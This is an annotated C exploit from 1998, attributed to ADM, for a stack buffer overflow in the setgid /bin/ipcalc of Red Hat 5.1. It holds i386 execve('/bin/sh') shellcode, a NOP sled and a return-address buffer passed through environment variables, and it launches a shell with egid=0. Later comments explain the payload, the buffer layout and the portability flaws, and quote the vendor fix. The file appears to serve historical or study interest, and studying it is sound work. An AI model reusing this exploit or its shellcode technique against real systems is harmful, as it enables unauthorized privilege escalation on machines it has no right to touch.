/****   ADM PRIVATE -- DO NOT DISTRIBUTE

  one-minute RedHat 5.1 /bin/ipcalc exploit 
  by plaguez from ADM.  Gives you egid=0.

  Greets to all ADM ppl.

     * (02-Jun-1998) Security Fix:
       The /sbin/ipcalc binary in the Red Hat 5.1 initscripts had the
       setgid bit turned on inadvertently, which may give local users
       access to the root group (no exploit has been published yet).

****/


#include <stdio.h>
#include <unistd.h>


/*
 * Payload bytes, stored as a C string so main() can hand them to
 * setenv() and measure them with strlen().  The tail is the literal
 * "/bin/sh" followed by "\x0" (a NUL written as an escape); the bytes
 * before it appear to be i386 machine code (the "\xcd\x80" sequence is
 * the Linux int 0x80 system-call instruction).  Because the payload
 * travels as a NUL-terminated string, it must contain no 0x00 byte
 * before the final terminator -- none appears below.
 */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh\x0";



/* Shell command handed to system(): the ipcalc binary (setgid root on
 * the affected release, per the header) with $BIDULE -- set by main()
 * to the contents of `bo` -- expanded by /bin/sh into the --hostname
 * argument.  $MACHIN (the `sc` buffer) is not referenced here; it
 * reaches the child only through the inherited environment. */
#define CHAINE "/bin/ipcalc --hostname \"12.12.12.1 $BIDULE\""
/* Size in bytes of `sc`: filled with 0x90 (x86 nop) and the payload,
 * then exported as $MACHIN. */
#define SCSIZE 4096
/* Size in bytes of `bo`: filled with copies of one address, then
 * exported as $BIDULE. */
#define BOSIZE  240
/* Initial value of `offset` in main().  It is negative, so
 * get_esp() - offset lands above the current stack pointer;
 * argv[1], if given, is subtracted from it. */
#define DEFAULT -1000

/*
 * Returns the current stack pointer on i386.
 *
 * The body only copies %esp into %eax and then falls off the end with
 * no `return` statement, so the caller receives whatever is left in
 * %eax -- the return register under the i386 calling convention.
 * Reaching the end of a non-void function and using the result is
 * undefined behaviour in C; this works only on a 32-bit x86 target
 * with a toolchain that does not touch %eax between the asm statement
 * and the function epilogue, and a modern compiler may warn on or
 * miscompile it (NOTE(review): not verified against any current GCC).
 */
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}


/*
 * Entry point.  Fills two buffers, exports them as the environment
 * variables MACHIN and BIDULE, and runs CHAINE through system().
 *
 * argv[1], if present, is parsed with atoi() and subtracted from the
 * default stack offset (DEFAULT); no other arguments are read.
 *
 * Portability / correctness notes (left as-is, since the behaviour
 * depends on the exact size and stack placement of `sc` and `bo`):
 *  - `void main` is not a valid hosted-program signature.
 *  - atoi, memset, memcpy, strlen, setenv and system are called
 *    without their <stdlib.h>/<string.h> prototypes (the file only
 *    includes <stdio.h> and <unistd.h>), i.e. implicit declarations.
 *  - printf() is given a `long *` for a "%x" conversion.
 *
 * Defensive note: the 02-Jun-1998 vendor fix quoted in the file header
 * concerns the setgid bit on ipcalc; without that bit there is no
 * group-privilege boundary for a local user to cross here, whatever
 * ipcalc does with its --hostname argument.
 */
void main(int argc, char * argv[])
{
  char sc[SCSIZE],bo[BOSIZE];     /* sc: 0x90 fill + payload; bo: repeated address */
  int offset = DEFAULT;           /* negative, see DEFAULT */
  long *addr;
   
  if(argc > 1) 
    offset -= atoi(argv[1]);      /* atoi() reports no errors: non-numeric input becomes 0 */

  addr = get_esp() - offset;      /* integer assigned to a pointer without a cast; only used for the printf below */
  
  printf("\ntarget addr: 0x%x\n",addr);   /* "%x" expects unsigned int, addr is a pointer */
  
  /* Write the same address into bo one `long` at a time.  BOSIZE (240)
   * is a multiple of sizeof(long) on both 32- and 64-bit targets, so
   * the last iteration ends exactly at bo[BOSIZE-1]; the NUL written
   * next overwrites the final byte of that last copy so bo is a valid
   * C string for setenv(). */
  for(addr=(long*)bo;addr<(long*)&bo[BOSIZE-1];addr++)
    *addr=get_esp()-offset;
  bo[BOSIZE-1]='\x0';
  
  /* sc: all 0x90 bytes, with the payload copied into the tail so that
   * exactly one byte remains for the terminating NUL.  strlen() on
   * shellcode is what makes the "no 0x00 inside the payload" rule
   * mandatory. */
  memset(sc,'\x90',SCSIZE);
  memcpy(sc+SCSIZE-strlen(shellcode)-1,shellcode,strlen(shellcode));
  sc[SCSIZE-1]='\x0';
  
  /* Both buffers reach the child only via the environment; CHAINE
   * expands $BIDULE on the ipcalc command line, $MACHIN is merely
   * inherited. */
  setenv("MACHIN",sc,1);
  setenv("BIDULE",bo,1);

  /* system() runs CHAINE via /bin/sh -c with this process's
   * environment.  Its return value is not checked. */
  system(CHAINE);

}


